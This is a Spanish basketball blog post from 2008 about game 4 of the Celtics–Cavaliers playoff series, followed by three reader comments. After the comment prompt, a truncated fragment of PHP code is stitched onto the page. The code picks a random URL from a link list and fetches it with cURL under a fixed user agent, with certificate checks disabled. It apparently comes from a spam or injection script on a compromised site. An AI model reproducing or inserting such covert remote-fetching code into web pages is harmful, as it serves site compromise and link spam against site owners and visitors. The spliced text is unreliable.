Signos de flaqueza (BOS 77 – CLE 88)

13 de May de 2008 por txusma

Si fuera seguidor de los Celtics empezaría a mostrar signos de preocupación. Antes de empezar los Playoffs la plantilla de Boston era la más completa, sus últimos fichajes (Sam Casell y PJ Brown) los más inteligentes, sus 3 estrellas las más rutilantes y su entrenador debería haber sido el entrenador del año. Unos días después cualquier parecido con aquel equipo es pura coincidencia. Ray Allen ni está ni se le espera, Paul Pierce ha bajado sus prestaciones de forma alarmante, Rajon Rondo se ha mostrado como el base joven e inexperto que es, Sam Cassell solo vuela con viento a favor y los Celtics no han ganado ningún partido fuera de casa en estos Playoffs. Evidentemente, por el hecho de quedar primeros en la liga regular, podrían seguir hasta el final y ganar el anillo, pero no son pocos ya los que están quitando a Boston la vitola de favoritos.

Ayer de nuevo partido bastante pobre (y van 4) resuelto en los minutos finales por Lebron James. El de Ohio, que había fallado sus anteriores 6 lanzamientos, anotó un triple, asistió a Gibson para que hiciera lo propio, machacó brutalmente sobre Kevin Garnett y de nuevo asistió a Varejao para que certificara definitivamente la victoria de Cleveland, todo en 3 minutos. Visto y no visto. Wally Szcerbiack, Daniel Gibson y Anderson Varejao ayer si que cumplieron con su papel de secundarios y aprovecharon gran parte de las 13 asistencia de Lebron. Éste no está fino en el tiro (7 de 20 ayer, 22% de acierto en la eliminatoria) pero sigue siendo determinante y es sin duda, el jugador que marcará el devenir de este enfrentamiento, porque si hay un jugador que puede asaltar el Garden ese es sin duda “King” James (con permiso del MVP).

Comenta

3 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Si lo de Hawks fue una sorpresa en toda regla… lo de Cavs empieza a ser una dinámica y muy fea, por cierto.

    Anoche, Ray Allen el menos malo de los tres. Garnett desapareció durante TODA la segunda parte (y de eso es precísamente de lo que le acusan sus detractores, de hacerse caquis en el peor momento) Pierce fallón a más no poder… el resto, enseñando sus vergüenzas.
    Me está empezando a tocar la moral el “abrazos” a Lebrón para pararle de las maneras más apestosas y repugnantes que uno se imagina. Ahora señalo con el dedo a Boston y “franquicias” Posey. Parecen empeñados a perder el respeto que les tenemos (me refiero a Boston, porque al otro…)

    Y lo peor es que Lebron todavía no ha aparecido ¿estará esperando para el petardazo del 7º???

      Citar

  2. Gallis dice:
    #2

    Ufff, como aparezca Lebron, suena a cataclismo…

    En serio, la imagen de Boston es cuasi patética fuera de casa. Ayer les falló lo único regular que habían tenido hasta ahora, Garnett…el resto mal, muy mal…

    Y ya lo dije en su momento. si Boston espera ganar el quinto y fiarlo todo a un séptimo, esperando que sea tan fácil como contra los Hawks, ojito…

      Citar

  3. Viva_Dirk dice:
    #3

    Ayer Boston dio la cara como lo hizo en el 4º en Atlanta, y volvió a pasar que aun jugando al máximo de concentración no pudieron con el rival. Aunque al menos recuperaron a Allen que es una buena señal.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>